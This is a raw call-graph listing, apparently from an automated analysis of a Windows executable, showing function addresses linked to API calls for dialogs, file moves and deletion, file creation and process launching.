7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21799->21804 21801 7ff70ecd1c80 33 API calls 21801->21889 21802 7ff70ecee558 33 API calls 21802->21889 21803 7ff70ecf2abc 22138 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21803->22138 21809 7ff70ecf2a7a 21804->21809 21814 7ff70ecd1c80 33 API calls 21805->21814 21859 7ff70ecf26df 21805->21859 21807 7ff70ecd1b70 31 API calls 21807->21770 21808 7ff70ecf2ac8 22140 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21808->22140 21820 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21809->21820 21810 7ff70ecf2ac2 22139 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21810->22139 21811 7ff70ecd1c80 33 API calls 21845 7ff70ecf0fd9 21811->21845 21813 7ff70ecf2ab6 22137 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21813->22137 21821 7ff70ecf24b3 21814->21821 21817 7ff70ecf2890 21817->21808 21817->21810 21833 7ff70ecf288b 
memcpy_s 21817->21833 21838 7ff70ecf5ae0 4 API calls 21817->21838 21819 7ff70ecf277a 21819->21803 21819->21813 21828 7ff70ecf27c2 memcpy_s 21819->21828 21819->21833 21835 7ff70ecf5ae0 4 API calls 21819->21835 21826 7ff70ecf2a80 21820->21826 21834 7ff70ecd12bc 33 API calls 21821->21834 21868 7ff70ecf2ab0 21821->21868 21822 7ff70ecd2274 31 API calls 21822->21889 21825 7ff70eced6d8 31 API calls 21825->21889 21839 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21826->21839 21827 7ff70ecd5ff4 51 API calls 21827->21889 22051 7ff70ecf3030 21828->22051 21830 7ff70ecf1139 GetDlgItem 21837 7ff70ecd2120 SetWindowTextW 21830->21837 21833->21807 21840 7ff70ecf24f6 21834->21840 21835->21828 21841 7ff70ecf1158 SendMessageW 21837->21841 21838->21833 21842 7ff70ecf2a86 21839->21842 22126 7ff70ecdd124 21840->22126 21841->21845 21848 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21842->21848 21845->21760 21845->21811 21849 7ff70ecf118c SendMessageW 21845->21849 21845->21889 21897 7ff70ecd1b70 31 API calls 21845->21897 22093 7ff70ecd8ebc 47 API calls memcpy_s 21845->22093 22096 7ff70ecd2274 31 API calls _invalid_parameter_noinfo_noreturn 21845->22096 22097 7ff70ecedf84 145 API calls 2 library calls 21845->22097 21846 7ff70ecd72ac 53 API calls 21846->21889 21847 7ff70ecddb98 33 API calls 21847->21889 21852 7ff70ecf2a8c 21848->21852 21849->21845 21850 7ff70ecd5790 51 API calls 21850->21889 21851 7ff70ecd62f0 54 API calls 21851->21889 21856 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21852->21856 21855 7ff70ecd1b70 31 API calls 21855->21889 21862 7ff70ecf2a92 21856->21862 21857 7ff70ecd885c 8 API calls 21857->21889 21858 7ff70ecf2aa4 21860 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21858->21860 21859->21817 21859->21819 21859->21858 21863 7ff70ecf2aaa 21859->21863 21860->21863 21861 7ff70ecd2314 33 API calls 21861->21889 21869 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21862->21869 21864 7ff70ecfae94 
_invalid_parameter_noinfo_noreturn 31 API calls 21863->21864 21864->21868 21865 7ff70ecd5238 33 API calls 21865->21889 21866 7ff70ecf14ae SHFileOperationW 21866->21889 22136 7ff70ecd353c 47 API calls 21868->22136 21872 7ff70ecf2a98 21869->21872 21870 7ff70ecd6dd8 33 API calls 21870->21889 21871 7ff70ecd587c 51 API calls 21871->21889 21875 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21872->21875 21873 7ff70ecd71f4 33 API calls 21873->21889 21874 7ff70ecd52c0 33 API calls 21874->21889 21877 7ff70ecf2a9e 21875->21877 21876 7ff70ecd210c SetDlgItemTextW 21876->21889 21881 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21877->21881 21879 7ff70ecd8b28 47 API calls 21879->21889 21881->21858 21883 7ff70ecd1b70 31 API calls 21891 7ff70ecf2521 21883->21891 21884 7ff70ecd12bc 33 API calls 21884->21889 21885 7ff70ecd12bc 33 API calls 21885->21891 21888 7ff70ece0aa0 CompareStringW 21888->21891 21889->21749 21889->21753 21889->21755 21889->21758 21889->21762 21889->21764 21889->21767 21889->21770 21889->21771 21889->21776 21889->21778 21889->21779 21889->21785 21889->21789 21889->21790 21889->21793 21889->21794 21889->21799 21889->21801 21889->21802 21889->21809 21889->21822 21889->21825 21889->21826 21889->21827 21889->21842 21889->21845 21889->21846 21889->21847 21889->21850 21889->21851 21889->21852 21889->21855 21889->21857 21889->21861 21889->21862 21889->21865 21889->21866 21889->21870 21889->21871 21889->21873 21889->21874 21889->21876 21889->21879 21889->21884 21890 7ff70ecd5890 51 API calls 21889->21890 21892 7ff70ecf1ae9 EndDialog 21889->21892 21895 7ff70ecf1671 MoveFileW 21889->21895 21898 7ff70ecd552c 56 API calls 21889->21898 22050 7ff70ece0aa0 CompareStringW 21889->22050 22090 7ff70ecdce9c 35 API calls _invalid_parameter_noinfo_noreturn 21889->22090 22091 7ff70eced26c 33 API calls Concurrency::cancel_current_task 21889->22091 22092 7ff70ecf3f3c 31 API calls _invalid_parameter_noinfo_noreturn 21889->22092 22094 7ff70ecee384 33 API calls 
_invalid_parameter_noinfo_noreturn 21889->22094 22095 7ff70eced154 33 API calls 21889->22095 22098 7ff70ecee738 33 API calls 3 library calls 21889->22098 22099 7ff70ecd88f8 21889->22099 22115 7ff70ecd6448 33 API calls 21889->22115 22116 7ff70ecd7d6c 33 API calls 3 library calls 21889->22116 22117 7ff70ecd1734 33 API calls 4 library calls 21889->22117 22118 7ff70ecd1170 33 API calls memcpy_s 21889->22118 22119 7ff70ecd6260 FindClose 21889->22119 22120 7ff70ece0ad0 CompareStringW 21889->22120 22121 7ff70eced848 47 API calls 21889->22121 22122 7ff70ecec414 51 API calls 3 library calls 21889->22122 22123 7ff70ecee6a4 33 API calls _handle_error 21889->22123 22124 7ff70ecd7254 CompareStringW 21889->22124 22125 7ff70ecd8be4 47 API calls 21889->22125 21890->21889 21891->21859 21891->21872 21891->21877 21891->21883 21891->21885 21891->21888 21894 7ff70ecdd124 33 API calls 21891->21894 21892->21889 21894->21891 21895->21845 21896 7ff70ecf16a5 MoveFileExW 21895->21896 21896->21845 21897->21845 21898->21889 21901 7ff70ecf34dd 21900->21901 21902 7ff70ecd1c80 33 API calls 21901->21902 21903 7ff70ecf34f3 21902->21903 21904 7ff70ecf3528 21903->21904 21905 7ff70ecd1c80 33 API calls 21903->21905 22152 7ff70ece9a70 21904->22152 21905->21904 22345 7ff70ecec12c 21908->22345 21911 7ff70ecf3007 21913 7ff70ecf5c30 _handle_error 8 API calls 21911->21913 21912 7ff70ecf2f17 GetWindow 21917 7ff70ecf2f32 21912->21917 21914 7ff70ecef9eb 21913->21914 21914->21377 21914->21378 21915 7ff70ecf2f3e GetClassNameW 22350 7ff70ece0aa0 CompareStringW 21915->22350 21917->21911 21917->21915 21918 7ff70ecf2fe6 GetWindow 21917->21918 21919 7ff70ecf2f67 GetWindowLongPtrW 21917->21919 21918->21911 21918->21917 21919->21918 21920 7ff70ecf2f79 SendMessageW 21919->21920 21920->21918 21921 7ff70ecf2f95 GetObjectW 21920->21921 22351 7ff70ecec194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21921->22351 21923 7ff70ecf2fb1 22352 7ff70ecec15c 21923->22352 22356 7ff70ececa30 16 API calls _handle_error 21923->22356 21926 
7ff70ecf2fc9 SendMessageW DeleteObject 21926->21918 21928 7ff70ecd2127 21927->21928 21929 7ff70ecd212a SetWindowTextW 21927->21929 21928->21929 21930->21398 21932 7ff70ecd2344 21931->21932 21939 7ff70ecd23f8 21931->21939 21933 7ff70ecd2352 memcpy_s 21932->21933 21936 7ff70ecd23f3 21932->21936 21938 7ff70ecd23a1 21932->21938 21933->21415 22359 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21936->22359 21938->21933 21940 7ff70ecf5ae0 4 API calls 21938->21940 22360 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21939->22360 21940->21933 21941->21426 21942->21469 21944 7ff70ecd5890 51 API calls 21943->21944 21945 7ff70ecd5885 21944->21945 21945->21470 21945->21497 21946->21470 21948 7ff70ecd13c4 33 API calls 21947->21948 21949 7ff70ecd7c45 21948->21949 21950 7ff70ecd7c48 GetModuleFileNameW 21949->21950 21953 7ff70ecd7c98 21949->21953 21951 7ff70ecd7c63 21950->21951 21952 7ff70ecd7c9a 21950->21952 21951->21949 21952->21953 21954 7ff70ecd12bc 33 API calls 21953->21954 21955 7ff70ecd7cc2 21954->21955 21956 7ff70ecd7cfa 21955->21956 21957 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21955->21957 21956->21539 21958 7ff70ecd7d1c 21957->21958 21959->21554 21960->21586 21961->21597 21962->21609 21963->21614 21964->21623 21966 7ff70ecf6df0 21965->21966 21966->21626 21967->21557 21968->21584 21970->21511 21971->21643 21972->21672 21973->21684 21974->21699 21976 7ff70ecd61e8 swprintf 46 API calls 21975->21976 21977 7ff70ecda909 21976->21977 21978 7ff70ece0688 WideCharToMultiByte 21977->21978 21979 7ff70ecda919 21978->21979 21980 7ff70ecda989 21979->21980 21991 7ff70ecd9c00 31 API calls 21979->21991 21997 7ff70ecda96a SetDlgItemTextW 21979->21997 22000 7ff70ecd9808 21980->22000 21983 7ff70ecdaa03 21986 7ff70ecdaac2 21983->21986 21987 7ff70ecdaa0c GetWindowLongPtrW 21983->21987 21984 7ff70ecdaaf2 GetSystemMetrics GetWindow 21985 7ff70ecdac21 21984->21985 21998 7ff70ecdab1d 21984->21998 21988 7ff70ecf5c30 
_handle_error 8 API calls 21985->21988 22016 7ff70ecd99a8 21986->22016 22015 7ff70ed3f270 21987->22015 21992 7ff70ecdac30 21988->21992 21991->21979 21992->21712 21993 7ff70ecdaaaa GetWindowRect 21993->21986 21995 7ff70ecdab3e GetWindowRect 21995->21998 21996 7ff70ecdaae5 SetWindowTextW 21996->21984 21997->21979 21998->21985 21998->21995 21999 7ff70ecdac00 GetWindow 21998->21999 21999->21985 21999->21998 22001 7ff70ecd99a8 47 API calls 22000->22001 22005 7ff70ecd984f 22001->22005 22002 7ff70ecd995a 22003 7ff70ecf5c30 _handle_error 8 API calls 22002->22003 22004 7ff70ecd998e GetWindowRect GetClientRect 22003->22004 22004->21983 22004->21984 22005->22002 22006 7ff70ecd12bc 33 API calls 22005->22006 22007 7ff70ecd989c 22006->22007 22008 7ff70ecd12bc 33 API calls 22007->22008 22014 7ff70ecd99a1 22007->22014 22011 7ff70ecd9914 22008->22011 22009 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22010 7ff70ecd99a7 22009->22010 22011->22002 22012 7ff70ecd999c 22011->22012 22013 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22012->22013 22013->22014 22014->22009 22015->21993 22017 7ff70ecd61e8 swprintf 46 API calls 22016->22017 22018 7ff70ecd99eb 22017->22018 22019 7ff70ece0688 WideCharToMultiByte 22018->22019 22020 7ff70ecd9a03 22019->22020 22021 7ff70ecd9c00 31 API calls 22020->22021 22022 7ff70ecd9a1b 22021->22022 22023 7ff70ecf5c30 _handle_error 8 API calls 22022->22023 22024 7ff70ecd9a2b 22023->22024 22024->21984 22024->21996 22026 7ff70ecd13c4 33 API calls 22025->22026 22027 7ff70ecd2062 GetWindowTextW 22026->22027 22028 7ff70ecd2094 22027->22028 22029 7ff70ecd12bc 33 API calls 22028->22029 22030 7ff70ecd20a2 22029->22030 22032 7ff70ecd2105 22030->22032 22034 7ff70ecd20dd 22030->22034 22031 7ff70ecf5c30 _handle_error 8 API calls 22033 7ff70ecd20f3 22031->22033 22035 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22032->22035 22033->21721 22034->22031 22036 7ff70ecd210a 22035->22036 22038 7ff70ecd610f 22037->22038 22039 
7ff70ecd61da 22037->22039 22043 7ff70ecd611f memcpy_s 22038->22043 22044 7ff70ecd5004 33 API calls 2 library calls 22038->22044 22045 7ff70ecd353c 47 API calls 22039->22045 22043->21742 22044->22043 22047 7ff70ecee57f 22046->22047 22048 7ff70ecee586 22046->22048 22047->21889 22048->22047 22141 7ff70ecd1734 33 API calls 4 library calls 22048->22141 22050->21889 22055 7ff70ecf3079 memcpy_s 22051->22055 22067 7ff70ecf33cd 22051->22067 22052 7ff70ecd1b70 31 API calls 22053 7ff70ecf33ec 22052->22053 22054 7ff70ecf5c30 _handle_error 8 API calls 22053->22054 22056 7ff70ecf33f8 22054->22056 22057 7ff70ecf31d4 22055->22057 22148 7ff70ece0aa0 CompareStringW 22055->22148 22056->21833 22059 7ff70ecd12bc 33 API calls 22057->22059 22060 7ff70ecf3210 22059->22060 22061 7ff70ecd587c 51 API calls 22060->22061 22062 7ff70ecf321a 22061->22062 22063 7ff70ecd1b70 31 API calls 22062->22063 22068 7ff70ecf3225 22063->22068 22064 7ff70ecf3292 ShellExecuteExW 22065 7ff70ecf32a5 22064->22065 22066 7ff70ecf3396 22064->22066 22069 7ff70ecf32c4 IsWindowVisible 22065->22069 22070 7ff70ecf32de WaitForInputIdle 22065->22070 22072 7ff70ecf3333 CloseHandle 22065->22072 22066->22067 22075 7ff70ecf344b 22066->22075 22067->22052 22068->22064 22071 7ff70ecd12bc 33 API calls 22068->22071 22069->22070 22073 7ff70ecf32d1 ShowWindow 22069->22073 22142 7ff70ecf3928 22070->22142 22076 7ff70ecf3267 22071->22076 22079 7ff70ecf3351 22072->22079 22080 7ff70ecf3342 22072->22080 22073->22070 22077 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22075->22077 22149 7ff70ecd72ac 53 API calls 2 library calls 22076->22149 22082 7ff70ecf3450 22077->22082 22079->22066 22089 7ff70ecf3387 ShowWindow 22079->22089 22150 7ff70ece0aa0 CompareStringW 22080->22150 22081 7ff70ecf32f6 22081->22072 22086 7ff70ecf3304 GetExitCodeProcess 22081->22086 22083 7ff70ecf3275 22085 7ff70ecd1b70 31 API calls 22083->22085 22088 7ff70ecf327f 22085->22088 22086->22072 22087 7ff70ecf3317 22086->22087 22087->22072 22088->22064 
22089->22066 22090->21889 22091->21889 22092->21889 22093->21845 22094->21889 22095->21889 22097->21830 22098->21889 22100 7ff70ecd8936 22099->22100 22101 7ff70ecd2314 33 API calls 22100->22101 22103 7ff70ecd8946 22101->22103 22102 7ff70ecd8987 22104 7ff70ecd1c04 33 API calls 22102->22104 22103->22102 22151 7ff70ecd1734 33 API calls 4 library calls 22103->22151 22106 7ff70ecd89cd 22104->22106 22107 7ff70ecd89f0 22106->22107 22108 7ff70ecd1c80 33 API calls 22106->22108 22109 7ff70ecd8a28 22107->22109 22111 7ff70ecd8a44 22107->22111 22108->22107 22110 7ff70ecf5c30 _handle_error 8 API calls 22109->22110 22112 7ff70ecd8a39 22110->22112 22113 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22111->22113 22112->21889 22114 7ff70ecd8a49 22113->22114 22115->21889 22116->21889 22117->21866 22118->21889 22120->21889 22121->21889 22122->21889 22123->21889 22124->21889 22125->21889 22128 7ff70ecdd156 22126->22128 22127 7ff70ecdd18a 22127->21891 22128->22127 22129 7ff70ecd1734 33 API calls 22128->22129 22129->22128 22130->21788 22141->22048 22143 7ff70ecf397b WaitForSingleObject 22142->22143 22144 7ff70ecf3933 PeekMessageW 22143->22144 22145 7ff70ecf398d 22143->22145 22146 7ff70ecf394f GetMessageW TranslateMessage DispatchMessageW 22144->22146 22147 7ff70ecf3978 22144->22147 22145->22081 22146->22147 22147->22143 22148->22057 22149->22083 22150->22079 22151->22102 22153 7ff70ece9a80 memcpy_s _snwprintf 22152->22153 22170 7ff70ecdbb9c 22153->22170 22155 7ff70ece9b1e memcpy_s 22173 7ff70ece9518 22155->22173 22159 7ff70ece9b88 22160 7ff70ece9bcb 22159->22160 22162 7ff70ece9cf4 22159->22162 22184 7ff70ece9cfc 22160->22184 22164 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22162->22164 22165 7ff70ece9cf9 22164->22165 22167 7ff70ecf5c30 _handle_error 8 API calls 22168 7ff70ece9cde 22167->22168 22168->21612 22169 7ff70ece9bd9 22169->22167 22171 7ff70ecd13c4 33 API calls 22170->22171 22172 7ff70ecdbbc1 22171->22172 22172->22155 22174 7ff70ece959f memcpy_s 
22173->22174 22175 7ff70ecd1b70 31 API calls 22174->22175 22176 7ff70ece97d0 memcpy_s 22174->22176 22175->22176 22177 7ff70ece986f 22176->22177 22212 7ff70ece7fa8 33 API calls 22176->22212 22179 7ff70ecdbbf8 22177->22179 22180 7ff70ecdbc06 shared_ptr 22179->22180 22181 7ff70ecdbc39 22180->22181 22182 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22180->22182 22181->22159 22183 7ff70ecdbc5a 22182->22183 22185 7ff70ece9d0a 22184->22185 22186 7ff70ece9bd5 22185->22186 22213 7ff70ecd3c7c 82 API calls 22185->22213 22186->22169 22188 7ff70ece6d28 22186->22188 22214 7ff70ece76f8 22188->22214 22191 7ff70ece6f54 22194 7ff70ece6f52 22191->22194 22251 7ff70ecd3ca0 100 API calls 22191->22251 22195 7ff70ecf5c30 _handle_error 8 API calls 22194->22195 22197 7ff70ece6fa2 22195->22197 22196 7ff70ecd2314 33 API calls 22200 7ff70ece6d85 22196->22200 22197->22169 22198 7ff70ece1dd0 64 API calls 22198->22200 22199 7ff70ecd6288 55 API calls 22199->22200 22200->22194 22200->22196 22200->22198 22200->22199 22202 7ff70ece6fc4 22200->22202 22204 7ff70ece6ea0 22200->22204 22205 7ff70ece6fbf 22200->22205 22201 7ff70ece6f1f 22243 7ff70ece524c 22201->22243 22207 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22202->22207 22204->22201 22204->22202 22204->22205 22208 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22205->22208 22206 7ff70ece6f37 22206->22191 22210 7ff70ece6f43 22206->22210 22209 7ff70ece6fca 22207->22209 22208->22202 22250 7ff70ecd39e0 82 API calls 22210->22250 22212->22177 22213->22186 22215 7ff70ecd6288 55 API calls 22214->22215 22216 7ff70ece7760 22215->22216 22217 7ff70ece4e68 107 API calls 22216->22217 22221 7ff70ece777b 22216->22221 22218 7ff70ece7777 22217->22218 22218->22221 22252 7ff70ece9db0 22218->22252 22219 7ff70ece79a6 22222 7ff70ecf5c30 _handle_error 8 API calls 22219->22222 22221->22219 22224 7ff70ece79db 22221->22224 22225 7ff70ece6d5a 22222->22225 22227 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 
22224->22227 22225->22191 22225->22200 22249 7ff70ecd39e0 82 API calls 22225->22249 22229 7ff70ece79e0 22227->22229 22244 7ff70ece528a 22243->22244 22246 7ff70ece5280 22243->22246 22244->22246 22248 7ff70ecd4c40 101 API calls 22244->22248 22245 7ff70ece52ae 22247 7ff70ecd4d50 101 API calls 22245->22247 22246->22206 22247->22246 22248->22245 22249->22200 22250->22194 22261 7ff70ecd4c40 101 API calls 22252->22261 22253 7ff70ece9de5 22262 7ff70ecd4a70 104 API calls 22253->22262 22254 7ff70ece9e51 22256 7ff70ecf5c30 _handle_error 8 API calls 22254->22256 22255 7ff70ece9e00 22255->22254 22259 7ff70ecd4c40 101 API calls 22255->22259 22257 7ff70ece778f 22256->22257 22263 7ff70ecd45f0 22257->22263 22258 7ff70ece9e36 22260 7ff70ecd4a70 104 API calls 22258->22260 22259->22258 22260->22254 22261->22253 22262->22255 22346 7ff70ecec15c 4 API calls 22345->22346 22347 7ff70ecec13a 22346->22347 22348 7ff70ecec149 22347->22348 22357 7ff70ecec194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22347->22357 22348->21911 22348->21912 22350->21917 22351->21923 22353 7ff70ecec16e 22352->22353 22355 7ff70ecec173 22352->22355 22358 7ff70ecec1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22353->22358 22355->21923 22356->21926 22357->22348 22358->22355 22381 7ff70ecff40c 22388 7ff70ed00470 22381->22388 22393 7ff70ed00950 35 API calls 2 library calls 22388->22393 22390 7ff70ed0047b 22394 7ff70ed00570 35 API calls abort 22390->22394 22393->22390 22402 7ff70ecf5a00 22403 7ff70ecf5a16 _com_error::_com_error 22402->22403 22408 7ff70ecf7848 22403->22408 22405 7ff70ecf5a27 22406 7ff70ecf5390 _com_raise_error 14 API calls 22405->22406 22407 7ff70ecf5a73 22406->22407 22409 7ff70ecf7884 RtlPcToFileHeader 22408->22409 22412 7ff70ecf7867 22408->22412 22410 7ff70ecf78ab RaiseException 22409->22410 22411 7ff70ecf789c 22409->22411 22410->22405 22411->22410 22412->22409 22919 7ff70ecd5db8 22920 7ff70ecd5dfa 22919->22920 22921 7ff70ecd5890 51 API calls 22920->22921 22922 7ff70ecd5e2d 22921->22922 22923 
7ff70ecd5e44 CreateFileW 22922->22923 22925 7ff70ecd5ff4 51 API calls 22922->22925 22926 7ff70ecd5e8f 22923->22926 22932 7ff70ecd5f29 22923->22932 22925->22923 22927 7ff70ecd80b0 49 API calls 22926->22927 22928 7ff70ecd5eb2 22927->22928 22930 7ff70ecd5eee 22928->22930 22931 7ff70ecd5eb8 CreateFileW 22928->22931 22929 7ff70ecd5f81 SetFileTime CloseHandle 22933 7ff70ecd5fc1 22929->22933 22934 7ff70ecd5fcc 22929->22934 22930->22932 22937 7ff70ecd5fec 22930->22937 22931->22930 22932->22929 22932->22934 22935 7ff70ecd5ff4 51 API calls 22933->22935 22936 7ff70ecf5c30 _handle_error 8 API calls 22934->22936 22935->22934 22938 7ff70ecd5fd8 22936->22938 22939 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22937->22939 22940 7ff70ecd5ff1 22939->22940 20717 7ff70ecde760 20720 7ff70ecde7c0 SystemTimeToFileTime 20717->20720 20721 7ff70ecde832 20720->20721 20722 7ff70ecde8b7 20720->20722 20729 7ff70ecd6768 20721->20729 20724 7ff70ecf5c30 _handle_error 8 API calls 20722->20724 20726 7ff70ecde7bb 20724->20726 20727 7ff70ecde842 LocalFileTimeToFileTime 20727->20722 20728 7ff70ecde84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 20728->20722 20730 7ff70ecd678c GetVersionExW 20729->20730 20731 7ff70ecd67bf 20729->20731 20730->20731 20732 7ff70ecf5c30 _handle_error 8 API calls 20731->20732 20733 7ff70ecd67ec 20732->20733 20733->20727 20733->20728 20873 7ff70ece3e60 20874 7ff70ece3ec2 20873->20874 20877 7ff70ece3f05 20873->20877 20922 7ff70ece4ee4 20874->20922 20878 7ff70ece3fb4 20877->20878 20938 7ff70ecd4c40 20877->20938 20880 7ff70ece3fe0 20878->20880 20899 7ff70ece4049 20878->20899 20882 7ff70ece4023 20880->20882 20886 7ff70ece3fea 20880->20886 20944 7ff70ece5b60 20882->20944 20884 7ff70ece4ee4 59 API calls 20888 7ff70ece3ee2 20884->20888 20976 7ff70ecd4160 82 API calls 20886->20976 20888->20877 20891 7ff70ece3ee6 20888->20891 20890 7ff70ece3f98 20921 7ff70ecd4c40 101 API calls 20890->20921 20975 7ff70ecd3a9c 99 API 
calls 20891->20975 20894 7ff70ece3efc 20896 7ff70ecf5c30 _handle_error 8 API calls 20894->20896 20895 7ff70ece4031 20900 7ff70ece4168 20895->20900 21007 7ff70ecd3c7c 82 API calls 20895->21007 20901 7ff70ece42f0 20896->20901 20897 7ff70ece4000 20897->20894 20902 7ff70ece4940 106 API calls 20897->20902 20898 7ff70ece4d74 104 API calls 20898->20895 20915 7ff70ece412c 20899->20915 20991 7ff70ece511c 20899->20991 21000 7ff70ece00f0 20899->21000 21003 7ff70ece4d74 20899->21003 20908 7ff70ece41fd 20900->20908 21008 7ff70ece8db4 8 API calls 20900->21008 20905 7ff70ece4013 20902->20905 20977 7ff70ecd5790 20905->20977 20909 7ff70ece4244 20908->20909 21009 7ff70ecd38e0 82 API calls 2 library calls 20908->21009 20910 7ff70ece42c1 20909->20910 20914 7ff70ece42cf 20909->20914 21010 7ff70ecd4e00 SetEndOfFile 20909->21010 20910->20914 20955 7ff70ece4940 20910->20955 20914->20894 20916 7ff70ecd5790 51 API calls 20914->20916 20915->20895 20915->20898 20916->20894 20918 7ff70ece418e 20918->20908 20919 7ff70ece511c 120 API calls 20918->20919 20919->20918 20921->20878 20923 7ff70ecd6288 55 API calls 20922->20923 20924 7ff70ece4f42 20923->20924 20925 7ff70ece4f5b 20924->20925 20927 7ff70ece4f53 20924->20927 20926 7ff70ecf5ae0 4 API calls 20925->20926 20929 7ff70ece4f65 20926->20929 21027 7ff70ecd5db0 51 API calls 2 library calls 20927->21027 21011 7ff70ecd4334 20929->21011 20932 7ff70ece4ffb 20933 7ff70ecf5c30 _handle_error 8 API calls 20932->20933 20935 7ff70ece3ec7 20933->20935 20934 7ff70ece5023 20936 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20934->20936 20935->20877 20963 7ff70ecd552c 20935->20963 20937 7ff70ece5028 20936->20937 21028 7ff70ecd491c 20938->21028 20941 7ff70ecd4c67 20943 7ff70ecd4e00 SetEndOfFile 20941->20943 20943->20890 20945 7ff70ece5b99 20944->20945 20946 7ff70ece511c 120 API calls 20945->20946 20950 7ff70ece00f0 SendDlgItemMessageW 20945->20950 20951 7ff70ece5e0e 20945->20951 20952 7ff70ece5d91 20945->20952 21036 7ff70ece6294 20945->21036 21058 
7ff70ece6b60 20945->21058 21067 7ff70ecd4d50 20945->21067 21076 7ff70ece699c 125 API calls _handle_error 20945->21076 20946->20945 20950->20945 20951->20895 20952->20951 20953 7ff70ece4d74 104 API calls 20952->20953 20953->20951 20956 7ff70ece495a 20955->20956 20958 7ff70ece49b2 20955->20958 21088 7ff70ecd4c70 20956->21088 20959 7ff70ece4a2d 20958->20959 21099 7ff70ecd5ff4 20958->21099 20959->20914 20960 7ff70ece499e 21093 7ff70ecd42d0 20960->21093 20964 7ff70ecd5671 20963->20964 20971 7ff70ecd5562 20963->20971 20965 7ff70ecf5c30 _handle_error 8 API calls 20964->20965 20966 7ff70ecd5687 20965->20966 20966->20884 20967 7ff70ecd564b 20967->20964 20968 7ff70ecd5c60 56 API calls 20967->20968 20968->20964 20969 7ff70ecd12bc 33 API calls 20969->20971 20971->20967 20971->20969 20972 7ff70ecd569c 20971->20972 21114 7ff70ecd5c60 20971->21114 20973 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20972->20973 20974 7ff70ecd56a1 20973->20974 20975->20894 20976->20897 20978 7ff70ecd57bb DeleteFileW 20977->20978 20979 7ff70ecd57b8 20977->20979 20980 7ff70ecd57d1 20978->20980 20988 7ff70ecd5850 20978->20988 20979->20978 20982 7ff70ecd80b0 49 API calls 20980->20982 20981 7ff70ecf5c30 _handle_error 8 API calls 20983 7ff70ecd5865 20981->20983 20984 7ff70ecd57f6 20982->20984 20983->20894 20985 7ff70ecd57fa DeleteFileW 20984->20985 20986 7ff70ecd5817 20984->20986 20985->20986 20987 7ff70ecd5875 20986->20987 20986->20988 20989 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20987->20989 20988->20981 20990 7ff70ecd587a 20989->20990 20992 7ff70ece5137 20991->20992 20998 7ff70ece512f 20991->20998 20995 7ff70ece518a 20992->20995 20992->20998 21148 7ff70ece53bc 20992->21148 20995->20998 21176 7ff70ece8d6c 8 API calls 20995->21176 20997 7ff70ece51e1 21177 7ff70ecd3df0 99 API calls 2 library calls 20997->21177 20998->20899 21000->20899 21001 7ff70ecf3a80 21000->21001 21002 7ff70ecf3a8f SendDlgItemMessageW 21001->21002 21005 7ff70ece4dad 21003->21005 21004 
7ff70ece4dd3 21004->20899 21005->21004 21341 7ff70ecd4e18 21005->21341 21007->20900 21008->20918 21009->20909 21010->20910 21014 7ff70ecd436a 21011->21014 21012 7ff70ecd439e 21016 7ff70ecd447f 21012->21016 21017 7ff70ecd80b0 49 API calls 21012->21017 21013 7ff70ecd43b1 CreateFileW 21013->21012 21014->21012 21014->21013 21015 7ff70ecd44af 21018 7ff70ecf5c30 _handle_error 8 API calls 21015->21018 21016->21015 21020 7ff70ecd1c80 33 API calls 21016->21020 21019 7ff70ecd4409 21017->21019 21021 7ff70ecd44c4 21018->21021 21022 7ff70ecd4446 21019->21022 21023 7ff70ecd440d CreateFileW 21019->21023 21020->21015 21021->20932 21021->20934 21022->21016 21024 7ff70ecd44d8 21022->21024 21023->21022 21025 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21024->21025 21026 7ff70ecd44dd 21025->21026 21027->20925 21034 7ff70ecd492d _snwprintf 21028->21034 21029 7ff70ecd4959 21031 7ff70ecf5c30 _handle_error 8 API calls 21029->21031 21030 7ff70ecd4a34 SetFilePointer 21030->21029 21033 7ff70ecd4a5c GetLastError 21030->21033 21032 7ff70ecd49c1 21031->21032 21032->20941 21035 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21032->21035 21033->21029 21034->21029 21034->21030 21038 7ff70ece62eb memcpy_s 21036->21038 21037 7ff70ece511c 120 API calls 21037->21038 21038->21037 21040 7ff70ece633d 21038->21040 21039 7ff70ece511c 120 API calls 21039->21040 21040->21039 21042 7ff70ece639f 